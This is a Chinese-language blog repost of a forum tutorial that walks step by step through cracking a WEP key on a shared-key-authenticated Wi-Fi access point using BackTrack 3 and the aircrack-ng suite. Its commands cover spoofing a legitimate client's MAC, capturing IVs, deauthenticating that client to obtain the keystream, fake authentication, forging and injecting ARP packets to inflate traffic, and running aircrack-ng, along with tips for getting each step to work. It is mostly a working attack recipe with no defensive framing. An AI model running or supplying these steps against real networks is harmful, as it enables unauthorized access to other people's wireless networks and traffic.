原文出處:http://www.anywlan.com/bbs/viewthread.php?tid=8368&highlight=BT3%CF%C2%C6%C6%BD%E2%B9%B2%CF%ED%C3%DC%D4%BF%C8%CF%D6%A4%B5%C4WEP%C3%DC%C2%EB
ifconfig –a
ifconfig –a wifi1 down
macchanger –m 00:1a:73:c5:31:e0 wifi1
这个命令中攻击用无线网卡的MAC必须用冒号隔开,这个命令以后对MAC的操作就不需要再用冒号隔开了,直接输数字和字母就可以了(十六进制)。
其中需要注意的就是这个伪装的MAC必须与AP的无线客户端相同,要不然很难成功,至少我是这样的。
ifconfig –a wifi1 up(加载攻击用无线网卡)
airmon-ng start wifi1 13
上面的13代表的是无线AP所工作的频道,2.4G WIFI用频率的最高频道为14频道。
准备工作完毕以后我们就可以开始了。
首先我们先开始收集ivs包。
相应的命令为:
airodump-ng – –ivs –w check – –bssid 00131004e526 –c 13 ath2
--ivs 表示只收集ivs包,
-w 后面表示收集ivs包所生成的文件名,但最后往往会在文件名后加上-01、-02等等,
--bssid 表示AP的MAC,这样做的好处就是只收集与这个MAC相对应的AP的ivs包,
-c 后面跟的AP的频道数。
这一步做完我们就可以开始正式的攻击了。
相应的攻击命令为:
aireplay-ng -0 1 –a 00131004e526 –c 001a73c5-31e0 ath2
-0 表示对无线客户端进行认证攻击,使无线客户端断线重连,以获得握手包。
1
表示攻击的次数,一般顺利的话1次就够了,不顺利的话攻击无数次都不成功,建议大家在纯的BT3下进行,VM下很难获得,我在VM做了N次,用WUSB54G V4只获得过一次握手包。
-a 后面跟的是AP的MAC,
-c 后面跟的所要攻击的无线客户端的MAC,记住这个参数一定是要-c,不能是-h哦。
攻击成功后会在airodump-ng的窗口的右上角出现捕获握手包的提示,它所保存的文件是以AP的MAC命名的XOR文件,注意与后面构建ARP包所必须的XOR文件相区别。
然后就是进行虚假认证攻击,相应的命令为:
aireplay-ng -1 0 –e LINKSYS –a 00131004e526 –y check-01-00-13-10-04-e5-26.xor ath2
-1 表示虚假认证攻击,
0 表示攻击延时,
-e 表示AP的ESSID,
-a 表示AP的MAC,
-y 表示捕获的握手包所生成的文件名。
看图中提示好像攻击只成功了一半,challenge是失败的,但是依然可以构建arp包,并成功进行注入攻击破解WEP密码。而且攻击会不断进行,我是用Ctrl+c来停止的。
然后就要开始进行-5攻击了,相应的命令为:
Aireplay-ng -5 –b 00131004e526 –h 001a73c531e0 ath2
出现“ Use this packet?”提示后输入“y”并回车。出现下面的画面就表示成功获得了构建arp包所必须的xor文件
获得xor文件以后我们就可以构建arp包了,相应的命令为:
packetforge-ng -0 –a 00131004e526 –h 001a73c531e0 –k 255.255.255.255 –l 255.255.255.255 –y fragment-0215-195944.xor –w arp
-l 是大写字母L的小写,不是1哦,
-y 后面跟的是构建arp包所必须的xor文件,
-w 后面跟的是构建的arp包所生成的文件名。
这一步以后我们就可以进行让DATA猛涨的注入式攻击了,相应的命令为:
aireplay-ng -2 –r arp –x 1024 ath2
-2 就是注入式攻击
-r 后面跟的是arp包文件名,
-x 定义所发送的攻击包的大小,最大为1024,默认为512,以大家可以稳定发送攻击包的大小为准,根据无线网卡的不同而不同。
大家可以看到一分钟的时间DATA数就从2万多增长到6万多了。
其实只要DATA数到大概5万的时候就可以开启实时破解了,相应的命令为:
aircrack-ng -n 128 *.ivs
沒有留言:
張貼留言